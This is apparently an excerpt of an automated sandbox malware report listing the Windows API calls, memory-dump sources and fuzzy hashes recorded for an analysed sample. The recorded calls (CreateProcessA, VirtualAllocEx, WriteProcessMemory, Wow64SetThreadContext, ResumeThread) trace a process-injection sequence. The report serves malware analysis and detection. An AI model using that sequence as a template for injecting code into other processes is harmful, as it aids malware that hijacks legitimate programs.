            Similarity
            • API ID:
            • String ID:
            • API String ID:
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:

            Execution Graph

            Execution Coverage:11.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:371
            Total number of Limit Nodes:28

            Control-flow Graph

            APIs
            • GetCurrentProcess.KERNEL32 ref: 014AD4BE
            • GetCurrentThread.KERNEL32 ref: 014AD4FB
            • GetCurrentProcess.KERNEL32 ref: 014AD538
            • GetCurrentThreadId.KERNEL32 ref: 014AD591
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0

            Control-flow Graph

            APIs
            • GetCurrentProcess.KERNEL32 ref: 014AD4BE
            • GetCurrentThread.KERNEL32 ref: 014AD4FB
            • GetCurrentProcess.KERNEL32 ref: 014AD538
            • GetCurrentThreadId.KERNEL32 ref: 014AD591
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0

            Control-flow Graph

            APIs
            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A2440B6
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0

            Control-flow Graph

            APIs
            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A2440B6
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0

            Control-flow Graph

            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 014AAFFE
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0

            Control-flow Graph

            APIs
            • CreateActCtxA.KERNEL32(?), ref: 014A59C9
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0

            Control-flow Graph

            APIs
            • CreateActCtxA.KERNEL32(?), ref: 014A59C9
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0

            Control-flow Graph

            APIs
            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A243C88
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: 3a49aba019eb6d7c72b18bebb614a8e0b9bfdb1c16c59388c395ab3fae3cc1fb
            • Instruction ID: 8083a6daf9379925d47a4624a2732b583e77bf9db0bf029f75c940632b4cc182
            • Opcode Fuzzy Hash: 3a49aba019eb6d7c72b18bebb614a8e0b9bfdb1c16c59388c395ab3fae3cc1fb
            • Instruction Fuzzy Hash: 032137B59003499FDB14CFA9C885BEEBBF1FF48310F108529E919A7240C7789954DFA4

            APIs
            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07107C7D,?,?), ref: 07107D2F
            Memory Dump Source
            • Source File: 00000009.00000002.2157167919.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_7100000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: DrawText
            • String ID:
            • API String ID: 2175133113-0
            • Opcode ID: c190187c5e5034ed41af9b5b8bd0d3efb7bad536523ffe175504a1ef25ff572f
            • Instruction ID: 1e181afbe6c6c9d2ad360675fceb62f6c84589ea7f41541baddda2bd7a7c76de
            • Opcode Fuzzy Hash: c190187c5e5034ed41af9b5b8bd0d3efb7bad536523ffe175504a1ef25ff572f
            • Instruction Fuzzy Hash: 1B31E6B590030A9FDB11CF9AD98469EBBF5FB48320F54842AE515A7250D775A940CFA0

            APIs
            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07107C7D,?,?), ref: 07107D2F
            Memory Dump Source
            • Source File: 00000009.00000002.2157167919.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_7100000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: DrawText
            • String ID:
            • API String ID: 2175133113-0
            • Opcode ID: 027dc507dc16a1d8a40202aadf8427537b1c6555375788499ec618d7b2ddc313
            • Instruction ID: f4ce16ef71e0ead002ddbedda8279aab5872f3abc80653cbaa9ee34271ddb703
            • Opcode Fuzzy Hash: 027dc507dc16a1d8a40202aadf8427537b1c6555375788499ec618d7b2ddc313
            • Instruction Fuzzy Hash: 6E31E3B5D0020A9FDF01CF99D9846EEBBF5BF48320F14842AE919A7350D774A954CFA0

            APIs
            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A243C88
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: 1f876f7b7ca94b542d7bcdd4e128bc7d41a48f159fe93fb6b44d1065efffed49
            • Instruction ID: 764a560bd2ff585c73e5eb9b6afbe4ff2847e901bfa53ef66ed1db67b454bd00
            • Opcode Fuzzy Hash: 1f876f7b7ca94b542d7bcdd4e128bc7d41a48f159fe93fb6b44d1065efffed49
            • Instruction Fuzzy Hash: 112126B19103499FDB14CFAAC985BDEBBF5FF48320F10842AE918A7240D7789950DBA4

            APIs
            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A243D68
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: 7aef33f6d72d8ce390b0b3619eeaf9250c847709afd9352653aac9b709cc26de
            • Instruction ID: 7dd99864833dac463a808ecda9eca149d30a5fa3d065cd095a6240290fd5c769
            • Opcode Fuzzy Hash: 7aef33f6d72d8ce390b0b3619eeaf9250c847709afd9352653aac9b709cc26de
            • Instruction Fuzzy Hash: 082124B18017499FDB10CFAAC881AEEBBB1BF48320F50842AE519A7250C7789910DF60
            APIs
            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A243ADE
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: 5d8e4ad25522d14b6793421cc87e736ab3857b98d95766be2651d4b247d6d940
            • Instruction ID: 128a057982cafd11df5b41fdd124ea1fabf93aef4f1f55704d9f0fe9fadf4ab3
            • Opcode Fuzzy Hash: 5d8e4ad25522d14b6793421cc87e736ab3857b98d95766be2651d4b247d6d940
            • Instruction Fuzzy Hash: AA216A719003098FDB14DFAAC4817EEBBF4AF88320F148429D559A7240DB789944CF90
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014AB079,00000800,00000000,00000000), ref: 014AB68A
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 71e2830523bc489cbdfc0b19b986c1f32ef3facb7a1acc7ad55b136cbcbb972b
            • Instruction ID: 016edb03218b0a9b127df40dda4d7405baa74a80ee81c1557f794d4bab6567f2
            • Opcode Fuzzy Hash: 71e2830523bc489cbdfc0b19b986c1f32ef3facb7a1acc7ad55b136cbcbb972b
            • Instruction Fuzzy Hash: C32157B28042498FDB10CFAAC844ADEBFF4EB58320F55805ED518A7210D775A404CFA5
            APIs
            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A243ADE
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: 9e94c69f062634be4be20ddd06f822d3b686270766538a31f1a0420335857099
            • Instruction ID: 9cfdafb7ef97564a844957d24d503bbfc5fc9d34e2092c0df80414301c191810
            • Opcode Fuzzy Hash: 9e94c69f062634be4be20ddd06f822d3b686270766538a31f1a0420335857099
            • Instruction Fuzzy Hash: 952149719103098FDB14CFAAC4857EEBBF4EF88324F14842AD519A7240DB78A944CFA5
            APIs
            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A243D68
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: 8ef5f7ff70745bb327688dd9edad84e4edd1188ca730db58883f468d29c18911
            • Instruction ID: 995068d484ca1505c7c743af23c492de460bbdd6eb37809aafb2e9a61e6db808
            • Opcode Fuzzy Hash: 8ef5f7ff70745bb327688dd9edad84e4edd1188ca730db58883f468d29c18911
            • Instruction Fuzzy Hash: FF2116B18007499FDB10CFAAC881ADEBBF5FF48320F50842AE518A7240D7789910CBA5
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AD70F
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 2c36d45ac5951b6efdec6882cb2e3552ffbc443b92dd444ddabc0188f0d48c90
            • Instruction ID: 1521aba6dab28878ee84dce7a74fcfeb66f4da8c630210f6337476e82357c11c
            • Opcode Fuzzy Hash: 2c36d45ac5951b6efdec6882cb2e3552ffbc443b92dd444ddabc0188f0d48c90
            • Instruction Fuzzy Hash: 7021E4B5D002499FDB10CF9AD984ADEBFF4FB48320F14801AE914A7310D374A950CF60
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AD70F
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: a9ce42ecc86a92742a58d822122a915308a69f9d5f8f93f42882e670199816a5
            • Instruction ID: 12ef58723624efc5efcd9e315612cdfc1c5b2355b7f29c974cbe3ff96e5734bd
            • Opcode Fuzzy Hash: a9ce42ecc86a92742a58d822122a915308a69f9d5f8f93f42882e670199816a5
            • Instruction Fuzzy Hash: D821E0B9D002499FDB10CFAAD984ADEBBF4FB48320F14841AE918A7350D378A950CF60
            APIs
            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A2470A5
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 9c04700048e05ae33b79df7cdc3bf785e8b7ef25a14ae3f89f4008f0112f7c70
            • Instruction ID: 9eb32652a0319e3f9eb8529dee37434a8f06ec7cb89998841688e2a11a841e8a
            • Opcode Fuzzy Hash: 9c04700048e05ae33b79df7cdc3bf785e8b7ef25a14ae3f89f4008f0112f7c70
            • Instruction Fuzzy Hash: B31144B18193898FDB21DF99C884BDEBFF8EB49320F14849AD554A7211C3B86944CFA1
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014AB079,00000800,00000000,00000000), ref: 014AB68A
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: d57af6ea056c190c6295278ba418c352d9b08c32d8b7ebb6e8f823a7b4d34c9e
            • Instruction ID: 3a1f9ee8c00414305f5a26094d95c057d54535546131482f933aabfd6876a3ce
            • Opcode Fuzzy Hash: d57af6ea056c190c6295278ba418c352d9b08c32d8b7ebb6e8f823a7b4d34c9e
            • Instruction Fuzzy Hash: 751103B68002499FDB10CF9AC444BDEFBF4EB98320F51852AE519A7210C375A545CFA5
            APIs
            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A243BA6
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 94b119e1af43c80d18241323de770a26258b4a90fe30f71d39a0bee29bc21372
            • Instruction ID: 5898b49353e2d77b90484e77dc127a538aeaa7aea9f4e030440ed4959d80a153
            • Opcode Fuzzy Hash: 94b119e1af43c80d18241323de770a26258b4a90fe30f71d39a0bee29bc21372
            • Instruction Fuzzy Hash: F01147728002499FDF10DFA9C845BEEBFF5AF88320F14841DE515AB250CB759914CF91
            APIs
            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A243BA6
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 1889c7998c264487385d6cb1fec8cbc2d4f6fd237c04b9902985bcba63bc2f1c
            • Instruction ID: 90bb9a0204bbe0cdf2775abd08a06f77d6900d4bcc10226cce9b853b7e42a8de
            • Opcode Fuzzy Hash: 1889c7998c264487385d6cb1fec8cbc2d4f6fd237c04b9902985bcba63bc2f1c
            • Instruction Fuzzy Hash: 2F1156728002499FDF10DFAAC845BDEBBF5AF88320F108419E519A7250CB75A910CFA0
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014AB079,00000800,00000000,00000000), ref: 014AB68A
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 59317aaba8d28092961ba8f4ad486f4ec2efe4b7a490936487e63d004b07f7da
            • Instruction ID: 02e534d79500662d0d8f8977ee23d1d6678a5539c215150206faa0255da89501
            • Opcode Fuzzy Hash: 59317aaba8d28092961ba8f4ad486f4ec2efe4b7a490936487e63d004b07f7da
            • Instruction Fuzzy Hash: F2111FB6C002498FDB14CFAAC584BEEFBF4EB58320F54852AD529A7210C378A545CFA5
            APIs
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: 43fba741dfbf684008ddeed2a5a046cec6b60095c2460ef2a204aa0e8e1fbcb5
            • Instruction ID: 05817f49a321fd5b8548dda9712e9fe0dda3c389b31897dbbe33d970fbaad7b9
            • Opcode Fuzzy Hash: 43fba741dfbf684008ddeed2a5a046cec6b60095c2460ef2a204aa0e8e1fbcb5
            • Instruction Fuzzy Hash: FE1158B19003498FDB24DFAAC4457EEFBF4AF88320F24842AD119A7240CB79A940CB94
            APIs
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: 4839a20a459cf91a29931742917692cab1838f1d5364d3741406509909c0b505
            • Instruction ID: f6c7229b91d111eba9b63d3cb655e08bdd52b0c7e92585f5b379f7821ad1af37
            • Opcode Fuzzy Hash: 4839a20a459cf91a29931742917692cab1838f1d5364d3741406509909c0b505
            • Instruction Fuzzy Hash: 101128B19003498FDB14DFAAC44579EFBF4AF88624F248429D519A7240CB79A940CBA5
            APIs
            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A2470A5
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 55a541283112e76169a29761efdb15aa5e49f1aefc0256959dd31a21f850b20f
            • Instruction ID: 3b615db6f8abeb52058e10226bee206b369d1b76f6fb3f92729a7b49d072b0a5
            • Opcode Fuzzy Hash: 55a541283112e76169a29761efdb15aa5e49f1aefc0256959dd31a21f850b20f
            • Instruction Fuzzy Hash: 8711F2B58103499FDB10DF99C485BEEBFF4FB48324F20845AD529A7610C3B5A944CFA1
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 014AAFFE
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: c53be906837a3fa49175fd8c47a0dbdc78b111303b63ca277fd833b43f682d0a
            • Instruction ID: 60e1bfa9ab4de4766af8c5dd80a8bf6a931fd27a0dbf00d1e4512344eab86749
            • Opcode Fuzzy Hash: c53be906837a3fa49175fd8c47a0dbdc78b111303b63ca277fd833b43f682d0a
            • Instruction Fuzzy Hash: D4110FB6C006498FDB24CF9AC444B9EFBF4EB88224F10842AD529A7310D379A545CFA1
            APIs
            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A2470A5
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 1271982383be9232684623667246431da06c7b30b3ec46a31737e70794f2d82f
            • Instruction ID: ac4ab0a786674aeca97443dc3eea4301311332e3a29eeb79e5f72837c31acfc0
            • Opcode Fuzzy Hash: 1271982383be9232684623667246431da06c7b30b3ec46a31737e70794f2d82f
            • Instruction Fuzzy Hash: A31106B5810349DFDB20DF99C485BDEBFF8EB48320F10945AE514A7600D3B5A944CFA1
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014AB079,00000800,00000000,00000000), ref: 014AB68A
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 84370fdce2d23c74895e0789996d5318acfd3698a143bf4a3c1ff521300bcddd
            • Instruction ID: ef5455981e9e0f6bca0c8714fb009e4a34351b5d7a0f4ff00699ca37b27ef28d
            • Opcode Fuzzy Hash: 84370fdce2d23c74895e0789996d5318acfd3698a143bf4a3c1ff521300bcddd
            • Instruction Fuzzy Hash: 0D018F769043489FDB108FADD804BDABFF4EFA5328F05805BE248D7261C3B99454CBA5
            Memory Dump Source
            • Source File: 00000009.00000002.2151637110.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_114d000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0be8a5a2ab88707b9abf8993a00c28bfb6c0f6b0fce78595ba22d5a4914cec2c
            • Instruction ID: 462a2b6b7cbe6d550b375777a9b79c0658e35ee56264ce1240d7184c9687422b
            • Opcode Fuzzy Hash: 0be8a5a2ab88707b9abf8993a00c28bfb6c0f6b0fce78595ba22d5a4914cec2c
            • Instruction Fuzzy Hash: 50212172600240EFDF09DF54E9C0B2ABF71FB98B18F248169E9090E256C736D416CAA2
            Memory Dump Source
            • Source File: 00000009.00000002.2151707540.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_115d000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5588bf4f7e54202f988e4ccebb12f942bc8aec8ecd64a317d100f00b4d51c96b
            • Instruction ID: 9a003f8e0fda7f3776b1504e48e165a6beb94a46e9d083cb43175b1f74eceaf1
            • Opcode Fuzzy Hash: 5588bf4f7e54202f988e4ccebb12f942bc8aec8ecd64a317d100f00b4d51c96b
            • Instruction Fuzzy Hash: B1210071504200EFDF49DF94E9C0B26BBA1FB84324F20C56DED0A4B252C776D446CB62
            Memory Dump Source
            • Source File: 00000009.00000002.2151707540.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_115d000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 92022ee8907b4dab48697ad6223b7a5362fbc3d47b3c6cce8ccad3bcd4bca541
            • Instruction ID: fb6df7a604040db7e5b9506002cfec23c6a66df5639ae547e3990473a8b8b142
            • Opcode Fuzzy Hash: 92022ee8907b4dab48697ad6223b7a5362fbc3d47b3c6cce8ccad3bcd4bca541
            • Instruction Fuzzy Hash: 72210075604200EFDF59DF54E9C0B26BB61EB84314F20C56DDD1A4B252C77AD407CB62
            Memory Dump Source
            • Source File: 00000009.00000002.2151707540.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_115d000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c99b148c547ddac76684d5c7cd1283fccac8c90842a418cb466938e67ec2a9b7
            • Instruction ID: e41e25ae1c319a0002e67fe6a2cbd45151b88dc9dabf4c4774bfdd97407e4fcc
            • Opcode Fuzzy Hash: c99b148c547ddac76684d5c7cd1283fccac8c90842a418cb466938e67ec2a9b7
            • Instruction Fuzzy Hash: EE21AC75509380CFDB07CF24D990B15BF71EB46214F28C5EAD8498B2A7C33AD80ACB62
            Memory Dump Source
            • Source File: 00000009.00000002.2151637110.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_114d000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
            • Instruction ID: ffc7f8678ed87aa975cb381c7d038445ba5189cfe22dd335b877feff3cd91b60
            • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
            • Instruction Fuzzy Hash: 1411CD76504280CFCF06CF54E5C0B16BF71FB94618F2486A9D8090B256C33AD456CBA2
            Memory Dump Source
            • Source File: 00000009.00000002.2151707540.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
